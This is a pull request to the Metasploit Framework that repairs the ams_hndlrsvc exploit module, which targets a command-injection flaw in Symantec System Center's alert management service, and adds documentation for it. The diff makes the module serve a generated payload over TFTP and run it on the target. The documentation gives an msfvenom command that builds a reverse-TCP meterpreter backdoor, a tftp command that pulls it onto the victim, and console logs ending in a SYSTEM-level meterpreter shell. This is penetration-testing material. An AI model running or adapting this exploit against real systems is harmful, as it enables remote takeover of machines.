### PR TITLE
Fix ams_hndlrsvc

### DIFF
--- a/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md
+++ b/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md
@@ -1,0 +1,166 @@
+## Vulnerable Application
+
+  This module exploits Symantec System Center's alert management system (hndlrsvc.exe) with an arbitrary command execution.  The payload is uploaded via TFTP
+  and then executed on the system.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/antivirus/ams_hndlrsvc`
+  4. Do: `set rhost`
+  5. Do: `exploit`
+  6. You should get a shell.
+
+## Options
+
+  **CMD**
+
+  Optional command line to run instead of attempting to directly inject a payload
+
+  **RPORT**
+
+  The port the service is running on.  Default is 38292.
+
+## Scenarios
+
+### Manual Upload and Execute
+
+If the module doesn't work for a shell, it's possible to run the CMD twice to emulate the steps the module takes.
+
+1. start atftpd: `atftpd --daemon --port=69 /tftpboot/`
+2. create payload: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 lport=4444 -f exe -o /tftpboot/backdoor.exe`
+3. start metasploit
+4. start a multihandler
+5. load the module: `use exploit/windows/antivirus/ams_hndlrsvc`
+6. use ams: `set CMD 'tftp -i 1.1.1.1 GET backdoor.exe'`
+7. run
+8. use ams: `set cmd 'backdoor.exe'`
+9. run
+
+  ```
+root@kali:~/metasploit-framework# ./msfconsole 
+
+msf > ifconfig
+[*] exec: ifconfig
+
+eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
+        inet 1.1.1.1  netmask 255.255.255.0  broadcast 192.168.3.255
+        inet6 fe80::20c:29ff:fef9:62a1  prefixlen 64  scopeid 0x20<link>
+        ether 00:0c:29:f9:1f:a1  txqueuelen 1000  (Ethernet)
+        RX packets 70933  bytes 39287343 (37.4 MiB)
+        RX errors 0  dropped 0  overruns 0  frame 0
+        TX packets 11688  bytes 3788654 (3.6 MiB)
+        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
+
+msf > use exploit/multi/handler 
+payload => windows/meterpreter/reverse_tcp
+msf exploit(handler) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf exploit(handler) > set lport 4444
+lport => 4444
+msf exploit(handler) > exploit -j
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Starting the payload handler...
+msf exploit(handler) > use exploit/windows/antivirus/ams_hndlrsvc 
+msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
+rhost => 2.2.2.2
+msf exploit(ams_hndlrsvc) > set lport 9999
+lport => 9999
+msf exploit(ams_hndlrsvc) > set cmd 'tftp -i 1.1.1.1 GET backdoor.exe'
+CMD => tftp -i 1.1.1.1 GET backdoor.exe
+msf exploit(ams_hndlrsvc) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:9999 
+[*] 2.2.2.2:38292 - Executing command 'tftp -i 1.1.1.1 GET backdoor.exe'
+[*] Exploit completed, but no session was created.
+msf exploit(ams_hndlrsvc) > set cmd 'backdoor.exe'
+cmd => backdoor.exe
+msf exploit(ams_hndlrsvc) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:9999 
+[*] 2.2.2.2:38292 - Executing command 'backdoor.exe'
+[*] Sending stage (957999 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1038) at 2016-09-30 11:59:13 -0400
+[*] Exploit completed, but no session was created.
+msf exploit(ams_hndlrsvc) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type                   Information                 Connection
+  --  ----                   -----------                 ----------
+  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WEBB  1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
+
+msf exploit(ams_hndlrsvc) > sessions -v
+
+Active sessions
+===============
+
+  Session ID: 1
+        Type: meterpreter x86/win32
+        Info: NT AUTHORITY\SYSTEM @ WEBB
+      Tunnel: 1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
+         Via: exploit/multi/handler
+        UUID: 0a85ec1678bc8465/x86=1/windows=1/2016-09-30T15:59:12Z
+   MachineID: 8b2889ec93a961f2cc3f2db4620def57
+     CheckIn: 28s ago @ 2016-09-30 12:00:15 -0400
+  Registered: No
+
+
+
+msf exploit(ams_hndlrsvc) > 
+
+  ```
+  
+### Using Standard Options
+  
+  ```
+msf > use exploit/windows/antivirus/ams_hndlrsvc 
+msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
+rhost => 2.2.2.2
+msf exploit(ams_hndlrsvc) > set lport 4445
+lport => 4445
+msf exploit(ams_hndlrsvc) > show options
+
+Module options (exploit/windows/antivirus/ams_hndlrsvc):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD                     no        Execute this command instead of using command stager
+   LHOST  1.1.1.1     no        The listen IP address from where the victim downloads the payload
+   RHOST  2.2.2.2   yes       The target address
+   RPORT  38292            yes       The target port
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     1.1.1.1     yes       The listen address
+   LPORT     4445             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Universal
+
+
+msf exploit(ams_hndlrsvc) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4445 
+[*] 2.2.2.2:38292 - Sending request to 2.2.2.2:38292
+[+] 2.2.2.2:38292 - tftp -i 1.1.1.1 GET OQTAVJBVWZH.exe
+[*] 2.2.2.2:38292 - Attempting to execute the payload...
+[+] 2.2.2.2:38292 - OQTAVJBVWZH.exe
+[*] Sending stage (957999 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4445 -> 2.2.2.2:1041) at 2016-09-30 12:13:18 -0400
+
+meterpreter > 
+
+  ```

--- a/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md
+++ b/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md
@@ -2,6 +2,7 @@
 
   This module exploits Symantec System Center's alert management system (hndlrsvc.exe) with an arbitrary command execution.  The payload is uploaded via TFTP
   and then executed on the system.
+  This is part of Symantec AntiVirus Corporate Edition 8.0-10.1.7
 
 ## Verification Steps
 

--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -18,7 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
           Symantec System Center Alert Management System is prone to a
         remote command-injection vulnerability because the application fails
-        to properly sanitize user-supplied input.
+        to properly sanitize user-supplied input.  This is part of Symantec
+        AntiVirus Corporate Edition 8.0 - 10.1.7.
       },
       'Author'         => [ 'MC' ],
       'License'        => MSF_LICENSE,

--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -3,10 +3,12 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'rex/proto/tftp'
+
 class MetasploitModule < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::EXE
 
@@ -24,6 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'OSVDB', '66807'],
           [ 'BID', '41959' ],
+          [ 'CVE', '2010-0111']
           [ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
         ],
       'Targets'       =>
@@ -37,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'Privileged' => true,
       'Platform' => 'win',
-      'CmdStagerFlavor' => 'tftp',
       'DefaultTarget' => 0,
       'DisclosureDate' => 'Jul 26 2010'))
 
@@ -45,23 +47,26 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(38292),
         OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
+        OptAddress.new('LHOST', [ false, 'The listen IP address from where the victim downloads the payload' ])
       ])
   end
 
   def windows_stager
+
+    @pl = generate_payload_exe
+    @tftp = Rex::Proto::TFTP::Server.new
+    payload_name = "#{Rex::Text.rand_text_alpha_upper(11)}.exe"
+    @tftp.register_file(payload_name,@pl,true)
+    @tftp.start
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
-    @payload_exe = generate_payload_exe
-
+    execute_command("tftp -i #{datastore['lhost']} GET #{payload_name}")
     print_status("Attempting to execute the payload...")
-    execute_command(@payload_exe)
-
+    execute_command(payload_name)
   end
 
   def execute_command(cmd, opts = {})
 
     connect
-
     if ( cmd.length > 128 )
       fail_with(Failure::Unknown, "Command strings greater then 128 characters will not be processed!")
     end
@@ -154,12 +159,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Platform']
       when 'win'
+        if datastore['LHOST'].blank?
+          fail_with(Failure::Unknown, 'If no custom CMD is set, LHOST is required.')
+        end
         windows_stager
       else
         fail_with(Failure::Unknown, 'Target not supported.')
     end
 
     handler
-
   end
 end
+

--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -24,10 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'OSVDB', '66807'],
-          [ 'BID', '41959' ],
-          [ 'CVE', '2010-0111']
-          [ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
+          ['OSVDB', '66807'],
+          ['BID', '41959'],
+          ['CVE', '2010-0111'],
+          ['URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt'],
         ],
       'Targets'       =>
         [
@@ -43,8 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget' => 0,
       'DisclosureDate' => 'Jul 26 2010'))
 
-    register_options(
-      [
+    register_options([
         Opt::RPORT(38292),
         OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
         OptAddress.new('LHOST', [ false, 'The listen IP address from where the victim downloads the payload' ])


### PR DESCRIPTION
Fixes #7437

`ams_hndlrsvc` is broken (see issue), and has been for a while.  I wrote a fix for it late 2016 and never committed it since the issue went with no response.  The file has been sitting on my desktop for 2 years, so I figured its better to submit it than not.  I haven't had access to the target in 2yrs, but it worked at the time.

This also adds documentation.